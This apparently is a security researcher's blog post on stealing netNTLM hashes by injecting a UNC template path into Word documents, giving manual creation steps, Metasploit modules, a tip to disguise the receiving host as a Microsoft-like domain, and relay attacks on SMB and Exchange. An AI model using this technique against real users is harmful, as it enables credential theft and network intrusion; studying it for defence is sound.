Stealing netNTLM credentials by injecting UNC path into .docx
Confirmed vulnerable are:
• Microsoft Word 2003
• Microsoft Word 2007
• Microsoft Word 2010
Using the .doc, .xml and .docx formats.
When doesn’t it work?
• Preview document window in Outlook.
• Opening document in read-only mode (like when it’s downloaded from the internet).
What can it do?
By using this method it’s possible to receive netNTLM hashes from local and domain users by sending them a specially crafted MS Word document. Upon opening they will try connect to a server, thus supplying netNTLM hashes and challenges to a remote destination of the attackers choice.
Why does this work?
This is not a new issue, the functionality has been around at least since Microsoft Office 2003 (verified). The difference is that, as far as we know, this is a new vector for netNTLM-hash stealing itself. The main issue is that documents created in MS Word allow for UNC-path template locations to be specified and saved into the document itself. Using this, a malicious person can create a document that will point to his server upon opening of the document. When converted to an XML document, the tag that causes the behavior that can be abused is this:
Any version of MS Word of 2003 or later will, upon opening the document connect to the referenced site using the SMB protocol. Https for Webdav seems to be valid too, but does not result in the hashes being submitted.
Creating a an evil reference manually
- Using Microsoft Office 2003, 2007 or 2010 (verified), and create a dotx template file. Save this template file to an UNC location, which is either a valid IP or FQDN that can be reached over the internet.
- Create a new Word document based on the just made dotx. Save this document as docx.
- Opening this document now will result in your netNTLM hashes being submitted to the referenced to UNC location.
I have created two modules for Metasploit to abuse this. First, an Auxiliary module that can both insert a reference into an existing file and create a new document. Secondly I created a Post module that allows, in meterpreter shells, to insert the UNC reference into a file on the remote site. Currently this is done without preserving the file timestomp, but that’s on the todo list. Because it’s likely that you run into a linux type machine as a document filestore at some point, it’s verified to work with Linux too. note: these are my currently dev paths to where I put the modules, that might change as I plan to submit them to the Metasploit framework.
The Post module in action:
Note that the default setting of the POST module keeps a copy locally of the modified file.
What happens when someone opens the document
Depending on the version of MS Word this screen will be visible for quite a long time. It’s not very hidden as you can see and that’s why it’s probably a good idea to use a dynamic host provider so you can point to something like updates.microsoft-office-server.dyndns.com or something less conspicuous.
How can you use this, other than the obvious password cracking?
Other than the obvious password cracking tools there are much better ways to abuse the fact that you have these netNTLM hashes. Relay modules like Metasploit’s smb_relay or Zackattack could be used with this to get access to not just SMB shares, but also Exchange!
You should definitely read up on what ZackAttack can do to get the most of these modules.
Where can you find the modules:
The modules can be found on my github:
- lucidnight/smilingraccoon for helping me with Ruby and Metasploit.
- Audi-1 for the original document analysis that gave me the idea for the modules.